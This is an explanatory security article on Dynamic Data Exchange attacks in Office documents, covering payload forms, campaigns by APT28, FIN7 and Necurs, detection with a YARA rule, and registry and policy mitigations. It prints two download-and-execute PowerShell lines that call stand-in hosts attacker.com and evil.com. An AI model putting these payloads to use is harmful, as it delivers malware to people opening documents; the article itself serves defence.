What is DDE?
Dynamic Data Exchange (DDE) is an inter-process communication protocol in Microsoft Windows that allows applications to share data. In the context of Microsoft Office, DDE enables documents to pull data from other applications — including cmd.exe.
The Attack Vector
No Macros Required
Unlike traditional macro-based attacks, DDE exploitation does not require the victim to enable macros. This is significant because:
- Many organizations focus their security policies on blocking macros
- DDE executes through a different mechanism entirely
- The warning prompts displayed to users are generic and easily bypassed through social engineering
How DDE Payloads Work
A DDE field in a Word document can execute arbitrary commands:
{DDEAUTO c:\windows\system32\cmd.exe "/k powershell -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')"}
When the document is opened, Word displays two prompts: 1. "This document contains links that may refer to other files. Do you want to update this document with the data from the linked files?" 2. "Remote data (c:\windows\system32\cmd.exe) not accessible. Do you want to start the application?"
Attack Variations
Word Documents
DDE fields can be inserted through:
- Insert > Quick Parts > Field > Formula
- Direct XML manipulation of the .docx file
- Document properties that reference DDE
Excel Spreadsheets
Excel supports DDE through formulas:
=cmd|'/c powershell IEX(New-Object Net.WebClient).DownloadString("http://evil.com/p.ps1")'!A1
Outlook
Calendar invites and emails can contain DDE fields that execute when previewed.
Real-World Campaigns
APT28 (Fancy Bear)
In October 2017, APT28 was observed using DDE in spear-phishing campaigns targeting: - European and North American defense organizations - Documents themed around recent cyber security conferences - DDE payload delivered Seduploader malware
FIN7
The financially motivated threat group used DDE attacks in: - Restaurant and hospitality industry targeting - Fake invoice documents - Carbanak backdoor delivery
Necurs Botnet
The massive Necurs botnet distributed DDE-weaponized documents at scale: - Millions of emails sent - Locky ransomware delivery - Themed as invoices, shipping notifications
Detection Methods
- Monitor process ancestry:
WINWORD.EXEspawningcmd.exeorpowershell.exeis highly suspicious - Email gateway scanning: Inspect Office documents for DDE fields before delivery
- YARA rules: Scan for DDE patterns in document files:
rule DDE_Attack {
strings:
$dde1 = "DDEAUTO" ascii nocase
$dde2 = "DDE" ascii nocase
$cmd = "cmd" ascii nocase
$ps = "powershell" ascii nocase
condition:
($dde1 or $dde2) and ($cmd or $ps)
}
- Windows Event Logs: Monitor for unusual child processes of Office applications
Mitigation
Microsoft released security updates and guidance:
-
Registry fix: Disable DDE in Word via registry:
HKEY_CURRENT_USER\Software\Microsoft\Office\<version>\Word\Security AllowDDE (DWORD) = 0 -
Group Policy: Deploy DDE restrictions via GPO
- Attack Surface Reduction rules: Windows Defender ASR includes rules to block DDE
- Microsoft's ADV170021: Security advisory with official mitigation steps
Conclusion
DDE attacks represent an important reminder that legitimate features can be weaponized. The fact that DDE attacks bypass macro security policies made them particularly effective until Microsoft's mitigation measures were widely deployed. Organizations should ensure these mitigations are applied and monitor for DDE-based attack indicators.